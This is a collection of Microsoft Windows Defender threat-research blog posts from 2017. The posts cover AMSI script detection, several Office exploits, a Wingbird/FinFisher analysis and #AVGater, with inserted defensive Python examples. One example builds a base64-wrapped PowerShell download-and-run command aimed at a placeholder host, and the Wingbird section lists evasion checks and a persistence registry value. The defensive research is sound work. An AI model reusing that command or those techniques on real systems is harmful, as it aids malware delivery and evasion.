More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new as well as never-before-seen malware in real-time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATP's enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

Microsoft Exchange Online Protection (EOP) can block Gamarue infections from email using built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.

Microsoft Digital Crimes Unit and Windows Defender Research team

Get more info on the Gamarue (Andromeda) takedown from the following sources:

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that ‘live off the land’

December 4th, 2017 No comments

Scripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.

Scripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the land: staying away from the disk and using common tools to run code directly in memory. Often part of the operating system, scripting engines can evaluate and execute content from the internet on the fly. Furthermore, integration with popular apps makes them effective vehicles for delivering malicious implants through social engineering, as evidenced by the increasing use of scripts in spam campaigns.

Malicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShell, the de facto scripting standard for administrative tasks on Windows, with the ability to invoke system APIs and access a variety of system classes and objects.

While the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.

Windows 10 provides optics into script behavior through Antimalware Scan Interface (AMSI), a generic, open interface that enables Windows Defender Antivirus to look at script contents the same way script interpreters do, in a form that is both unencrypted and unobfuscated. In Windows 10 Fall Creators Update, with knowledge from years of analyzing script-based malware, we've added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.

This unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection (Windows Defender ATP). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.

In this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP machine learning systems make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.

KRYPTON: Highlighting the resilience of script-based attacks

Traditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.

Apart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.

For example, the activity group KRYPTON has been observed hijacking or creating scheduled tasks; they often target system tasks found in exclusion lists of popular forensic tools like Autoruns for Windows. KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.

To illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by John Lambert and the Office 365 Advanced Threat Protection team.

Figure 1. KRYPTON lure document

To live off the land, KRYPTON doesn't drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (wscript.exe) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.

Figure 2. KRYPTON script execution chain through wscript.exe

Exposing actual script behavior with AMSI

AMSI overcomes KRYPTON's evasion mechanisms by capturing JavaScript API calls after they have been decrypted and are ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.

Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

By checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.

Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

PowerShell use by Kovter and other commodity malware

Advanced activity groups like KRYPTON are not the only ones shifting from binary executables to evasive scripts. In the commodity space, Kovter malware uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script that is decoded by a JavaScript file (executed by wscript.exe) and passed to powershell.exe as an environment variable.

Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

By looking at the PowerShell payload content captured by AMSI, experienced analysts can easily spot similarities to PowerSploit, a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.

Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Fresh machine learning insight with AMSI

While AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.

As outlined in our previous blog, we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.

Figure 7. Process tree augmented by instrumentation for AMSI data

As shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (winword.exe) to launch PowerShell (powershell.exe). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware fhjUQ72.tmp, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build expert classifiers for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.

With the instrumentation of AMSI signals added as part of the Windows 10 Fall Creators Update (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. We've also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, ngrams, and specific API invocations, to name a few.

As AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our deep neural networks automatically learn features that are often hidden from human analysts.
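Several of the script features named above (obfuscation layer count, entropy, n-grams, API invocations) can be approximated statically on content of the kind AMSI exposes, including the base64-wrapped PowerShell stage described for Kovter. The extractor below is an added example, not Windows Defender ATP code; it assumes the two decoding patterns it peels (`-EncodedCommand` arguments and literal `[Convert]::FromBase64String(...)` calls), its API token list, and the constructed two-layer sample command line.

```python
"""Static feature extraction for PowerShell/JScript command lines.

Added example, not Windows Defender ATP code. It approximates several of the
script features the post lists (obfuscation layer count, entropy, n-grams,
API invocations). Assumptions: the two decoding patterns it peels, the API
token list, and the constructed sample command line.
"""
from __future__ import annotations

import base64
import math
import re
from collections import Counter

# Names whose occurrences are counted; all are real PowerShell/JScript identifiers.
API_TOKENS = ("Invoke-Expression", "IEX", "New-Object", "DownloadString",
              "FromBase64String", "Start-Process", "Add-Type",
              "ActiveXObject", "WScript.Shell")

# powershell -e/-ec/-enc/-encoded/-encodedcommand <base64 of a UTF-16LE script>
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# [Convert]::FromBase64String('<base64>') with a literal argument (assumed UTF-8 text)
FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)


def shannon_entropy(text: str) -> float:
    """Bits per character; base64 blobs approach the 6-bit ceiling of a 64-symbol alphabet."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def _decode(blob: str, utf16: bool) -> str | None:
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le" if utf16 else "utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def peel_layers(script: str, max_layers: int = 8) -> tuple[str, int]:
    """Decode nested encoding layers; return (innermost script, layers removed)."""
    current, layers = script, 0
    while layers < max_layers:
        decoded = None
        m = ENCODED_CMD.search(current)
        if m:
            decoded = _decode(m.group(1), utf16=True)
        if decoded is None:
            m = FROM_B64.search(current)
            if m:
                decoded = _decode(m.group(1), utf16=False)
        if decoded is None:
            break
        current, layers = decoded, layers + 1
    return current, layers


def extract_features(script: str) -> dict:
    """Feature vector in the spirit of the post: layers, entropy, n-grams, API hits."""
    inner, layers = peel_layers(script)
    api_hits = {}
    for token in API_TOKENS:
        n = len(re.findall(r"\b" + re.escape(token) + r"\b", inner, re.I))
        if n:
            api_hits[token] = n
    return {
        "layers": layers,
        "outer_entropy": round(shannon_entropy(script), 3),
        "inner_entropy": round(shannon_entropy(inner), 3),
        "distinct_trigrams": len({inner[i:i + 3] for i in range(len(inner) - 2)}),
        "api_hits": api_hits,
        "inner_script": inner,
    }


def build_sample() -> str:
    """Constructed two-layer command line (not a real Kovter or KRYPTON sample):
    a download-and-run stage hidden behind base64 and -EncodedCommand."""
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    b64_2 = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
    stage1 = f"IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{b64_2}')))"
    b64_1 = base64.b64encode(stage1.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -nop -w hidden -enc {b64_1}"


if __name__ == "__main__":
    for key, value in extract_features(build_sample()).items():
        print(f"{key}: {value}")
```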

Figure 8. Machine learning detections of JavaScript and PowerShell scripts

While these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.

Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity

Detection of AMSI bypass attempts

With AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:

  • Bypasses that are part of the script content and can be inspected and alerted on
  • Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs
  • Patching of AMSI instrumentation in memory

The Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.

During actual attacks involving CVE-2017-8759, Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by Matt Graeber.

Figure 10. Windows Defender ATP alert based on AMSI bypass pattern

AMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.

Figure 11. AMSI bypass code sent to the cloud for analysis

Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks

Provided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.

AMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.

With Windows 10 Fall Creators Update (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.

Apart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.

To benefit from the new script runtime instrumentation and other powerful security enhancements like Windows Defender Exploit Guard, customers are encouraged to install Windows 10 Fall Creators Update.

Read The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advanced attacks, sign up for a free trial.

Stefan Sellmer, Windows Defender ATP Research

with

Shay Kels, Windows Defender ATP Research

Karthik Selvaraj, Windows Defender Research

Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks

November 21st, 2017 No comments

The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits and highlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how Office 365 Advanced Threat Protection, Windows Defender Advanced Threat Protection, and Windows Defender Exploit Guard protect customers from these exploits.

Exploit attacks in Fall 2017

The discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like ransomware and info stealers to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.

The Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.

CVE-2017-0199

CVE-2017-0199 is a remote code execution (RCE) vulnerability in Microsoft Office that allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore the Protected View warning message. The vulnerability, a logic bug in the URL moniker that executes HTA content using the htafile OLE object, was fixed in the April 2017 security updates.

Figure 1. CVE-2017-0199 exploit code

Ever since FireEye blogged about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking it up from publicly available exploit generator toolkits. As shown in Figure 2, the creator and lastModifiedBy attributes help identify the use of such toolkits in generating exploit documents.

Figure 2. Exploit kit identifier

A slight variation of this exploit, this time in the script moniker, was also released. When activated, this exploit can launch scriptlets (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute remote code, as shown in Figure 3.

Figure 3. PPSX activation for script moniker

CVE-2017-8570

The July 2017 security update from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, CVE-2017-8570, which was discovered in the URL moniker and, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as a zero-day, the public availability of an exploit toolkit created a wave of malicious PPSX attachments.

CVE-2017-8759

In September 2017, FireEye discovered another exploit used in targeted attacks. The CVE-2017-8759 exploit takes advantage of a code injection vulnerability in the .NET Framework while parsing a WSDL definition using the SOAP moniker. The vulnerability was fixed in the September 2017 security update. The original exploit used an HTA file, similar to CVE-2017-0199, to execute the attacker's code on vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple-VM-layered malware families, FinFisher, whose techniques we discuss in the succeeding section.

The CVE-2017-8759 exploit was soon ported to the PPSX file format. Figure 4 below shows an example of the exploit.

Figure 4. CVE-2017-8759 exploit

CVE-2017-11826

Finally, on September 28, 2017, Qihoo 360 identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the October 2017 security update. The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.

Figure 5. CVE-2017-11826 exploit

Payloads

Except for the memory corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.

As cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:

  • Attackers used HLFL as an element type in malicious RTF attachments. This element is not supported in the official RTF specification but serves as an effective obfuscation against static detections.

  • Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.
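A static triage check for the RTF obfuscation described in the two bullets above, added here as an example (not Microsoft's detection logic): it counts every control word in the document, flags the ones that fall outside the lowercase-only RTF specification, and lists OLE object markers for a reviewer. The two sample documents are constructed.

```python
"""Static triage of RTF attachments for the obfuscation the post describes.

Added example, not Microsoft's detection logic. The sample documents below
are constructed; the control-word names HLFL, ATNREF and MEQARR are the ones
the post reports seeing in malicious RTF attachments.
"""
from __future__ import annotations

import re
from collections import Counter

# Control words the post names as unsupported by the RTF specification.
REPORTED_JUNK = {"HLFL", "ATNREF", "MEQARR"}
# Real RTF control words that introduce embedded or linked OLE objects.
OBJECT_WORDS = {"object", "objemb", "objlink", "objautlink", "objclass",
                "objdata", "objupdate"}
# RTF control word: backslash, letters, optional signed numeric parameter.
# Control symbols such as \' or \* are not letters and are skipped.
CONTROL_WORD = re.compile(rb"\\([A-Za-z]+)(-?\d+)?")


def control_words(data: bytes) -> Counter:
    """Count every control word in the document."""
    return Counter(m.group(1).decode("ascii") for m in CONTROL_WORD.finditer(data))


def scan_rtf(data: bytes) -> dict:
    """Return triage findings for one RTF document."""
    words = control_words(data)
    # The specification defines control words as lowercase letter sequences,
    # so any word containing an uppercase letter is outside the spec.
    nonspec = sorted(w for w in words if w != w.lower())
    reported = sorted(w for w in nonspec if w in REPORTED_JUNK)
    objects = sorted(w for w in words if w in OBJECT_WORDS)
    header = data.lstrip()[:6]
    return {
        "header": header.decode("latin-1"),
        "standard_header": header.startswith(b"{\\rtf1"),
        "nonspec_words": nonspec,
        "reported_junk": reported,
        "object_words": objects,     # worth a closer look, not a verdict by itself
        "distinct_words": len(words),
        # Non-spec control words serve no purpose in a legitimate document.
        "suspicious": bool(nonspec),
    }


# Constructed sample in the style the post describes: junk control words
# sprinkled around an auto-updating linked object.
SAMPLE_RTF = (rb"{\rtf1\ansi\HLFL\deff0{\fonttbl{\f0 Calibri;}}"
              rb"\MEQARR{\object\objautlink\objupdate{\*\objclass Word.Document.8}"
              rb"{\*\objdata 0105000002000000}}\par Hello}")
# Constructed benign document for comparison.
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\f0\fs24 Hello\par}"

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```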

In most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.

Figure 6. PowerShell payload from the HTA file

However, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.

WingBird (also known as FinFisher)

Wingbird is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group NEODYMIUM is known to use this malware in their attack campaigns.

The group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our previous blog post on CVE-2017-8759. So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a blog:

  • CVE-2015-5119 (Adobe Flash)
  • CVE-2016-4117 (Adobe Flash)
  • CVE-2017-8759 (Microsoft Office)
  • CVE-2017-11292 (Adobe Flash)

The interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Here's a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.

The Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that probe whether the malware is being run in virtualized or debugged environments. We found at least 12 different checks used to evade execution in these environments. The most effective ones are:

  • Sandbox environment checks

    • Checks if the malware is executed under the root folder of a drive
    • Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents

  • Fingerprinting check

    • Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources

  • VM detection

    • Checks if the machine hardware IDs are VmBus in case of HyperV, or VEN_15AD in case of VMware, etc.

  • Debugger detection

    • Detects debugger and tries to kill it using undocumented APIs and information classes (specifically ThreadHideFromDebugger, ProcessDebugPort, ProcessDebugObjectHandle)

The latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:

  • [randomName].cab – Encrypted configuration file
  • setup.cab – The last PE code section of the setup module; content still unknown
  • d3d9.dll – Malware loader used on systems with restricted privileges; the module is protected by a VM
  • aepic.dll (or other name) – Malware loader used on admin-privileged systems; executed from (and injected into) a fake service; protected by a VM
  • msvcr90.dll – Malware loader DLL injected into the explorer.exe or winlogon.exe process; protected by a VM
  • [randomName].7z – Encrypted network plugin, used to spy on the victim's network communications
  • wsecedit.rar – Main malware dropped executable, protected by a VM

In the sample we analyzed, the command was 3, which led the malware to create a global event, 0x0A7F1FFAB12BB2, and drop malware components under a folder located in %ProgramData%, or in the %APPDATA% folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: “{Random value taken from config file}”
With data: “C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMDATA\AUDITAPP\D3D9.DLL, CONTROL_RUN”

If the startup command is 2, the malware copies explorer.exe in the local installation directory, renames d3d9.dll to uxtheme.dll, and creates a new explorer.exe process that loads the malware DLL in memory using the DLL sideloading technique.

All of Wingbird's plugins are stored in its resource section and provide the malware with various capabilities, including stealing sensitive information, spying on internet connections, or even diverting SSL connections.

Given the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.

Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite

Microsoft Office 365 Advanced Threat Protection blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like the one below in Office 365's Threat Explorer page:

Figure 7. Office 365 ATP detection

Customers using Windows Defender Advanced Threat Protection can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.

Figure 8. Windows Defender ATP alert

In addition, enterprises can block malicious documents using Windows Defender Exploit Guard, which is part of the defense-in-depth protection in Windows 10 Fall Creators Update. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).

Figure 9. Windows Defender Exploit Guard detection

Crimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.

At Microsoft, we don't stop working to protect our customers' mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide holistic protection for individuals and enterprises.


#AVGater vulnerability does not affect Windows Defender Antivirus, MSE, or SCEP

On November 10, 2017, a vulnerability called #AVGater was discovered affecting some antivirus products. The vulnerability requires a non-administrator-level account to perform a restore of a quarantined file.

Windows Defender Antivirus and other Microsoft antimalware products, including System Center Endpoint Protection (SCEP) and Microsoft Security Essentials (MSE), are not affected by this vulnerability.

This vulnerability can be exploited to restore files that have been detected and quarantined by an antivirus product. To exploit it, a malicious application, including one launched by a user-level account without administrator privileges, creates an NTFS junction from the %System% folder to the folder where the quarantined file is located. This NTFS junction can trigger the antivirus product to attempt to restore the file into the %System% folder.

This is a relatively old attack vector. By design, Microsoft antimalware products, including Windows Defender Antivirus, have never been affected by this vulnerability because they do not permit applications launched by user-level accounts to restore files from quarantine. This is part of the built-in protections against this and other known user-account permission vulnerabilities.
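The two controls described above, written out as an added example (not the code of Windows Defender or of any affected product): a restore routine that refuses unprivileged requesters and refuses any destination where the original folder or a component below it is a reparse point (NTFS junction or symlink) that would redirect the write. The function names and the Downloads/System32 layout in the demo are constructed assumptions.

```python
"""Checks a quarantine-restore routine should make before it writes a file.

Added example, not the code of Windows Defender or of any affected product.
It implements the two controls the text above credits with blocking this
attack: the requester must be privileged, and the restore location is refused
when any component from the original folder down is a reparse point (NTFS
junction or symlink) that would redirect the write elsewhere, such as into
%System%. The function names and the Downloads/System32 layout are constructed.
"""
import os
import stat
import tempfile
from pathlib import Path

FILE_ATTRIBUTE_REPARSE_POINT = 0x0400   # Windows: junctions, symlinks, mount points


class RestoreRefused(Exception):
    """Raised when a restore request fails a safety check."""


def is_reparse_point(path) -> bool:
    """True if this exact path (not followed) is a symlink or an NTFS reparse point."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return True
    # st_file_attributes exists only on Windows; junctions are reported there
    return bool(getattr(st, "st_file_attributes", 0) & FILE_ATTRIBUTE_REPARSE_POINT)


def vet_restore_path(destination: str, original_dir: str) -> Path:
    """Return the real path a restore would write to, or raise RestoreRefused.

    original_dir is the folder recorded when the file was quarantined. The
    folder itself and every existing component below it are inspected without
    following links, so a junction planted anywhere in between is caught, and
    the fully resolved destination must still lie inside the resolved folder."""
    root = Path(os.path.abspath(original_dir))
    dest = Path(os.path.abspath(destination))
    try:
        relative = dest.relative_to(root)
    except ValueError:
        raise RestoreRefused(f"{dest} is not under {root}") from None
    checkpoints = [root]
    for part in relative.parts:
        checkpoints.append(checkpoints[-1] / part)
    for current in checkpoints:
        if not os.path.lexists(current):   # lexists does not follow links
            break
        if is_reparse_point(current):
            raise RestoreRefused(f"reparse point on restore path: {current}")
    real_root = Path(os.path.realpath(root))
    real_dest = Path(os.path.realpath(dest))
    if real_dest != real_root and real_root not in real_dest.parents:
        raise RestoreRefused(f"{dest} resolves outside {real_root}")
    return real_dest


def restore_quarantined(content: bytes, destination: str, original_dir: str,
                        requester_is_admin: bool) -> str:
    """Write quarantined content back only for a privileged requester and a vetted path."""
    if not requester_is_admin:
        raise RestoreRefused("restoring from quarantine requires administrator rights")
    target = vet_restore_path(destination, original_dir)
    # O_EXCL: never overwrite something that appeared at the target in the meantime
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return str(target)


def run_demo() -> dict:
    """Constructed scenario: a Downloads folder with a planted link to a System32 stand-in."""
    outcome = {}
    with tempfile.TemporaryDirectory() as tmp:
        downloads = os.path.join(tmp, "Downloads")   # folder the sample was quarantined from
        system32 = os.path.join(tmp, "System32")     # stands in for %System%
        os.makedirs(os.path.join(downloads, "sub"))
        os.makedirs(system32)
        # A link an unprivileged user could plant inside the restore location
        os.symlink(system32, os.path.join(downloads, "planted"), target_is_directory=True)
        sample = b"constructed quarantined bytes"
        attempts = {
            "normal": (os.path.join(downloads, "sub", "sample.bin"), True),
            "via_link": (os.path.join(downloads, "planted", "evil.dll"), True),
            "non_admin": (os.path.join(downloads, "sub", "other.bin"), False),
            "outside": (os.path.join(system32, "evil.dll"), True),
        }
        for name, (path, admin) in attempts.items():
            try:
                restore_quarantined(sample, path, downloads, admin)
                outcome[name] = "restored"
            except RestoreRefused:
                outcome[name] = "refused"
        outcome["system32_untouched"] = os.listdir(system32) == []
    return outcome
```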

Read more about Windows Defender Antivirus and the rest of our Windows Defender protection products at the following links:

 

*Edited 11/17/2017 to include other Microsoft antimalware products

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Detecting reflective DLL loading with Windows Defender ATP

November 13th, 2017

